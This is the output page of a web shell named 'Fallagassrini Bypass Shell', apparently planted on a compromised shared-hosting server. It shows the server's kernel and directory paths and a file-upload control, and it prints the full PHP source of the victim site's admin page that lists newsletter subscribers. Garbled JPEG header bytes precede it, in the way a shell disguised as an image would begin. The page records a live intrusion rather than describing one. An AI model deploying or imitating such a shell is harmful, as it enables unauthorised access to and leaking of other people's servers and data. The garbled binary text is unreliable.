JFIF;CREATOR: gd-jpeg v1.0 (using IJG JPEG v80), quality = 85 C  !"$"$C$^" }!1AQa"q2#BR$3br %&'()*456789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz w!1AQaq"2B #3Rbr $4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz ? C^",k8`98?þ. s$ֱ$Xw_Z¿2b978%Q}s\ŴqXxzK1\@N2<JY{lF/Z=N[xrB}FJۨ<yǽw 5o۹^s(!fF*zn5`Z}Ҋ">Ir{_+<$$C_UC)^r25d:(c⣕U .fpSnFe\Ӱ.չ8# m=8iO^)R=^*_:M3x8k>(yDNYҵ/v-]WZ}h[*'ym&e`Xg>%̲yk߆՞Kwwrd󞼎 r;M<[AC¤ozʪ+h%BJcd`*ǎVz%6}G;mcՊ~b_aaiiE4jPLU<Ɗvg?q~!vc DpA/m|=-nux^Hޔ|mt&^ 唉KH?񯣾 ^]G\4#r qRRGV!i~眦]Ay6O#gm&;UV BH ~Y8( J4{U| 14%v0?6#{t񦊊#+{E8v??c9R]^Q,h#i[Y'Š+xY佑VR{ec1%|]p=Vԡʺ9rOZY L(^*;O'ƑYxQdݵq~5_uk{yH$HZ(3 )~G Fallagassrini

Fallagassrini Bypass Shell

echo"
Fallagassrini
";
Current Path : /home/jpewexports/public_html/application/views/admin/

Linux 43-225-53-84.webhostbox.net 3.10.0-1160.92.1.el7.x86_64 #1 SMP Tue Jun 20 11:48:01 UTC 2023 x86_64
Upload File :
Current File : /home/jpewexports/public_html/application/views/admin/social_links.php

<?php
$p_title='settings';
?>
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en">
<head>
    <meta http-equiv="Content-Type" content="text/html;charset=UTF-8" />
    <title>Users List</title>
    <link rel="shortcut icon" href="<?php echo $_SESSION['base_siteurl1'];?>favicon.ico" />

    <link rel="stylesheet" href="<?php echo $_SESSION['base_siteurl1'];?>css/style.css" media="all" type="text/css" />
    <link rel="stylesheet" href="<?php echo $_SESSION['base_siteurl1'];?>lib/datatables/css/table_jui.css" type="text/css" />
    <link rel="stylesheet" href="<?php echo $_SESSION['base_siteurl1'];?>http://fonts.googleapis.com/css?family=Open+Sans" type="text/css" />

    <script type="text/javascript" src="<?php echo $_SESSION['base_siteurl1'];?>js/head.load.min.js"></script>
<style>
#black_overlay_fd
{
     display:none;
    position: fixed;
    top: 0%;
    left:0%;
    width: 100%;
    height:100%;
    background-color: white;
    z-index:1001;
    -moz-opacity: 0.8;
    opacity:.60;
    filter: alpha(opacity=40);
}


#white_box_fd
{
display:none;
width:50%;
height:75%;
z-index:100000000000000000001;
background:#CCCCCC;
padding-bottom:10px;
position: fixed;
top: 30%;
left:30%;
border:solid 10px #666666;
border-radius:10px;

}

</style>


<style>
#black_overlay_edit
{
     display:none;
    position: fixed;
    top: 0%;
    left:0%;
    width: 100%;
    height:100%;
    background-color: white;
    z-index:1001;
    -moz-opacity: 0.8;
    opacity:.60;
    filter: alpha(opacity=40);
}


#white_box_edit
{
display:none;
width:50%;
height:75%;
z-index:100000000000000000001;
background:#CCCCCC;
padding-bottom:10px;
position: fixed;
top: 30%;
left:30%;
border:solid 10px #666666;
border-radius:10px;

}

</style>



<script language="javascript" type="text/javascript">
function open_fd() {
    document.getElementById("black_overlay_fd").style.display="block";
    document.getElementById("white_box_fd").style.display="block";
}
function close_fd() {
    document.getElementById("black_overlay_fd").style.display="none";
    document.getElementById("white_box_fd").style.display="none";
}

</script>

<script language="javascript" type="text/javascript">
function open_edit(id) {
    
  //  document.getElementById("black_overlay_edit").style.display="block";
   // document.getElementById("white_box_edit").style.display="block";
	 var url = "<?php echo base_url();?>admin/for_social_edit/index/"+id;
   $.post( url, { id:id },
	function( data ) {
	//alert(data);
	//return false;
	
	document.getElementById("black_overlay_edit").style.display="block";
   document.getElementById("white_box_edit").style.display="block";
   $('#white_box_edit_in').html(data);
	//alert(data);
	});
	
}
function close_edit() {
    document.getElementById("black_overlay_edit").style.display="none";
    document.getElementById("white_box_edit").style.display="none";
}

</script>



<script type="text/javascript" language="javascript">
function checkURL(value) 
{

	if(value==null)
	{
	
	document.getElementById("error").innerHTML ="Please Enter Website Address";
	   return false;
	   }
	   else
	   {
	   
	   }

    var urlregex = new RegExp("^(http:\/\/www.|https:\/\/www.|ftp:\/\/www.|www.){1}([0-9A-Za-z]+\.)");
    www=urlregex.test(value)
    //alert(www);
    
    var regexp = /(ftp|http|https):\/\/(\w+:{0,1}\w*@)?(\S+)(:[0-9]+)?(\/|\/([\w#!:.?+=&%@!\-\/]))?/
    http=regexp.test(value);
    //alert(http);
    
    if(www==true || http==true)
    {
	//alert('true');
		return true;
     }
    else
    {
		//alert('false');
       return false;
    }
}
function user_form()
{

var name = document.user_form1.name.value;
var url = document.user_form1.url.value;
var website_url = checkURL(url);
var image=document.getElementById("image").value;

 if(name=='' || url=='' || image=='')
	{
	//document.getElementById("error").innerHTML ="All Fields must be filled";
	document.getElementById("error").innerHTML ="All Fields must be filled";
	document.getElementById("error").style.display="block";
	return false;
	}
	
	if(website_url==false)
	{
	document.getElementById("error").innerHTML ="Please Enter Valid url";
	return false;
	}
	
	document.user_form1.action="<?php echo base_url();?>admin/social_links/add_link";
	document.user_form1.submit();

}
</script>
</head>
<body >
<!--------------------------------------popup for adding social links------------------------------------------------------------------------>
<div id="black_overlay_fd"></div>
<div id="white_box_fd" style="height:300px; width:450px; background-color:#FFFFFF;">
<a href="javascript:void(0)" onclick="close_fd();" id="close_fd_form" style="float:right;"><img src="<?php echo $_SESSION['base_siteurl1']; ?>images/fancy_close.png" /></a>
<form id="user_form1" method="post" action="" class="formEl_a"  name="user_form1" onsubmit="return user_form();" style="padding-left:10px;" enctype="multipart/form-data">
<div id="error" style="color:#FF0000; display:none;"></div>
								<p class="sepH_a">Add Social Links Here</p>
								<div class="msg_box msg_error" id="login_error" style="display:none">Please, enter data</div>
								<div class="sepH_b">
									<label for="name" class="lbl_a">Name: </label>
									<input type="text" id="name" name="name" size="30" class="inpt_a" />
								</div>
                                <div class="sepH_b">
									<label for="lname" class="lbl_a">URL: </label>
									<input type="text" id="url" name="url" size="30" class="inpt_a" />
								</div>
                                <div class="sepH_b">
									<label for="image" class="lbl_a">Icon: </label>
									<input type="file" id="image" name="image" size="30" class="inpt_a" />
								</div>
								
								<button type="submit" class="btn btn_c">ADD</button>
							</form>
</div>
<!-----------------------------------------------End of pop up----------------------------------------------------------------------------------->

<!----------------------------------------------edit user info pop up----------------------------------------------------------------------------->


<div id="black_overlay_edit"></div>

<div id="white_box_edit" style="height:300px; width:450px; background-color:#FFFFFF">
<a href="javascript:void(0)" onclick="close_edit();" id="close_fd_form" style="float:right;"><img src="<?php echo $_SESSION['base_siteurl1']; ?>images/fancy_close.png" /></a>
<div id="white_box_edit_in"></div>

</div>
<!-------------------------------------End of edit popup---------------------------------------------------------------------------------------->








    <!--<div id="slide_wrapper">
        <div id="slide_panel" class="wrapper">
            <div id="slide_content">
                <span id="slide_close"><img src="<?php echo $_SESSION['base_siteurl1'];?>images/blank.gif" alt="" class="round_x16_b" /></span>

				<div class="cf">
					<div class="dp100 sortable"><p class="s_color tac sepH_a">You can drag widgets from dashboard and drop it here.</p></div>
				</div>

				<div class="row cf">
					<div class="dp75 taj">
                        <h4 class="sepH_b">Lorem ipsum dolor sit amet...</h4>
                        Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam enim diam, vulputate vitae pharetra vel, pretium dictum ligula. In mauris eros, aliquam sit amet ullamcorper id, dictum eget ipsum. Nulla non porta arcu. Pellentesque faucibus, erat id interdum accumsan, neque magna ultrices ante, at laoreet lorem sem sit amet risus. Proin quis turpis ac nulla faucibus luctus at ac nisl. Suspendisse adipiscing turpis non risus tempus sit amet rhoncus est luctus. Cras in accumsan nulla. Lorem ipsum dolor sit amet, consectetur adipiscing elit. Nam enim diam, vulputate vitae pharetra vel, pretium dictum ligula. In mauris eros, aliquam sit amet ullamcorper id, dictum eget ipsum. Nulla non porta arcu. Pellentesque faucibus, erat id interdum accumsan, neque magna ultrices ante, at laoreet lorem sem sit amet risus. Proin quis turpis ac nulla faucibus luctus at ac nisl. Suspendisse adipiscing turpis non risus tempus sit amet rhoncus est luctus. Cras in accumsan nulla.
                    </div>
					<div class="dp25">
                        <div id="chart_k"></div>
                    </div>
				</div>
            </div>
        </div>
    </div>-->

	

	<?php 
	//include('header.php');
	?>

	<div id="main">
		<div class="wrapper">
			<div id="main_section" class="cf brdrrad_a">

					<div id="content_wrapper">
					<div id="main_content" class="cf">

						<h1 class="sepH_c">Newsletters Subscribers</h1>
        <!---------------------------------------Start of First Table------------------------------------------------------------>
       
						<table class="display" id="content_table">
                       <!--  <h3><a href="javascript:void(0);" class="btn btn_d" onclick="open_fd();" style="margin-left:170px;">Add New</a></h3>-->
							<thead>
								<tr>
									<th><div class="th_wrapp">Series</div></th>
									<th><div class="th_wrapp">Name</div></th>
                                    <th><div class="th_wrapp">EmailID</div></th>
                                   <th><div class="th_wrapp">Action</div></th>
								</tr>
							</thead>
							<tbody>
								<?php
								$sr=1;
								$sql_val=$this->db->query("select * from tbl_subscribe");
								foreach($sql_val->result_array() as $row_val)
								{ 
								
								$id=$row_val['id'];
								?>
								<tr>
									<td><?php echo $sr;?></td>
                                    <td><?php echo $row_val['name']; ?></td>
                                    <td><?php echo $row_val['email'];?></td>
                                    
																									
									<td class="content_actions">
                                                                       
                                    <a href="<?php echo base_url();?>admin/social_links/delete/<?php echo $id; ?>" title="Delete"><img src="<?php echo $_SESSION['base_siteurl1'];?>images/icons/trashcan_gray.png" alt="" /></a>
                                    </td>
								</tr>
								
								
								<?php 
								$sr=$sr+1;
								}
								?>
								
								
							</tbody>
						</table>

					</div>
				</div>
                
     <!----------------------------------------------End of Table-------------------------------------------------->           
        

			</div>
		</div>
	</div>

	

	<script type="text/javascript">
		head.js(
			"<?php echo $_SESSION['base_siteurl1'];?>js/jquery-1.6.2.min.js",
			"<?php echo $_SESSION['base_siteurl1'];?>lib/datatables/jquery.dataTables.min.js",
			"<?php echo $_SESSION['base_siteurl1'];?>lib/datatables/dataTables.plugins.js",
			"<?php echo $_SESSION['base_siteurl1'];?>lib/fusion-charts/FusionCharts.js",
			"<?php echo $_SESSION['base_siteurl1'];?>js/jquery.microaccordion.js",
			"<?php echo $_SESSION['base_siteurl1'];?>js/jquery.tools.min.js",
			"<?php echo $_SESSION['base_siteurl1'];?>js/jquery.stickyPanel.js",
			"<?php echo $_SESSION['base_siteurl1'];?>js/jquery.text-overflow.min.js",
			"<?php echo $_SESSION['base_siteurl1'];?>js/xbreadcrumbs.js",
			"<?php echo $_SESSION['base_siteurl1'];?>js/jquery.stickyPanel.js",
			"<?php echo $_SESSION['base_siteurl1'];?>js/lagu.js",
			function(){
				//lga_dataTables.lga_contentTable_a();
				$('#content_table').dataTable({
                 // "bSort": false,
                  "sPaginationType": "full_numbers"
                });
				
				lga_fusionCharts.chart_k();
			}
		)
    </script>


</body>
</html>

bypass 1.0, Devloped By El Moujahidin (the source has been moved and devloped)
Email: contact@elmoujehidin.net